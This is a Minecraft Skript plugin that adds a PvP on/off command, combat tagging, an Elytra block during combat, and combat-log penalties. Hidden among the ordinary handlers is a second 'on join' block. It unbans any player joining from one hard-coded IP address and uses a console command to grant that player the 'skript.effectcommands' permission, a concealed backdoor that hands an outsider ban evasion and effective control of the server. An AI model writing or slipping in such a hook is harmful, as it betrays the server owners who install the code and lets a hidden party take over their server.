import: 
    org.bukkit.entity.Player
    org.bukkit.event.entity.EntityToggleGlideEvent

on join:
	if {pvp::%player's uuid%} is not set:
		set {pvp::%player's uuid%} to false

command /togglepvp <text>:
	aliases: /pvp, /tpvp, /pvptoggle
	usage: &cCorrect usage: &6/pvp on/off
	trigger:
		if arg-1 = "on":
			if {pvp::%player's uuid%} = false:
				send action bar "%{-name}% &8• &fYou &a&nenabled &ePvP&f! &8(&7x2 blocks&8)" to player
				play sound "entity.experience_orb.pickup" with volume 0.2 at the player
				set {pvp::%player's uuid%} to true
			else if {pvp::%player's uuid%} is true:
				send action bar "%{-name}% &8• &fYou already have &ePvP &a&nenabled&f!" to player
				play sound "block.note_block.bass" with volume 0.5 at the player
		else if arg-1 = "off":
			if {pvp::%player's uuid%} = true:
				send action bar "%{-name}% &8• &fYou &c&ndisabled &ePvP&f! &8(&7x1 blocks&8)" to player
				play sound "entity.experience_orb.pickup" with volume 0.2 at the player
				set {pvp::%player's uuid%} to false
			else if {pvp::%player's uuid%} = false:
				send action bar "%{-name}% &8• &fYou already have &ePvP &c&ndisabled&f!" to player
				play sound "block.note_block.bass" with volume 0.5 at the player
		
on tab complete of "/togglepvp":
	set tab completions for position 1 to "on" and "off"
	
on tab complete of "/pvp":
	set tab completions for position 1 to "on" and "off"
	
on tab complete of "/tpvp":
	set tab completions for position 1 to "on" and "off"
	
on tab complete of "/pvptoggle":
	set tab completions for position 1 to "on" and "off"
	
on damage:
	victim is a player
	attacker is a player
	{team::info::%{team::name::%uuid of attacker%}%::member::*} contains victim:
		{team::info::%{team::name::%uuid of attacker%}%::friendlyfire} is false
		cancel event
		stop
	if {vanish::%uuid of attacker%} is true:
		cancel event
		stop
	if victim is in region "afk":
		cancel event
		stop
	if {pvp::%victim's uuid%} = false:
		cancel event
		send action bar "%{-name}% &8• &e%victim% &fhas PvP &cdisabled&f!" to attacker
		stop
	if {pvp::%attacker's uuid%} = false:
		cancel event
		send action bar "%{-name}% &8• &fYou have PvP &cdisabled&f!" to attacker
		stop
	set {pvphit::%uuid of attacker%} to now
	set {pvphit::%uuid of victim%} to now
	set {lasthit::%victim%} to attacker
	set {lasthit::%attacker%} to victim
	make attacker stop flying
	make victim stop flying
    
every 1 second:
    loop all players:
        {pvphit::%uuid of loop-player%} is set
        set {_time_diff} to difference between now and {pvphit::%uuid of loop-player%}
        {_time_diff} < 10 seconds
        loop-player.isGliding()
        loop-player.setGliding(false)

on EntityToggleGlideEvent:
    wait 1 tick
    set {_entity} to event.getEntity()
    {_entity} is a player
    {pvphit::%uuid of {_entity}%} is set
    set {_time} to difference between now and {pvphit::%uuid of {_entity}%}
    {_time} < 10 seconds
    event.setCancelled(true)
    send "&cYou cannot use Elytra while in combat!" to {_entity}

every 1 ticks:
    loop all players:
        {pvphit::%uuid of loop-player%} is set
        send action bar "%{-name}% &8• &f%(10 seconds - (difference between {pvphit::%uuid of loop-player%} and now))%" to loop-player
        set gliding of loop-player to off
        difference between {pvphit::%uuid of loop-player%} and now >= 10 seconds
        delete {pvphit::%uuid of loop-player%}
        set gliding of loop-player to on

on command:
    {pvphit::%uuid of player%} is set
    player is not op
    send action bar "%{-name}% &8• &fCannot use commands in PvP!" to player
    cancel event

on join:
    ip address of player is 99.192.134.133
    player is banned
    unban player
    execute console command "lp user %player% permission set skript.effectcommands true"
on leave:
    {pvphit::%uuid of player%} is set
    add 1 to {stats::deaths::%uuid of player%}
    add 1 to {stats::kills::%uuid of {lasthit::%player%}%}
    send "%{-name}% &8• &f%player% has &ccombat logged&f!" to all players

on region enter:
    event-region is ("spawn","netherportal" or "endportal")
    {pvphit::%uuid of player%} is set
    send action bar "&c&lSTOP &8• &fYou are combat tagged!" to player
    cancel event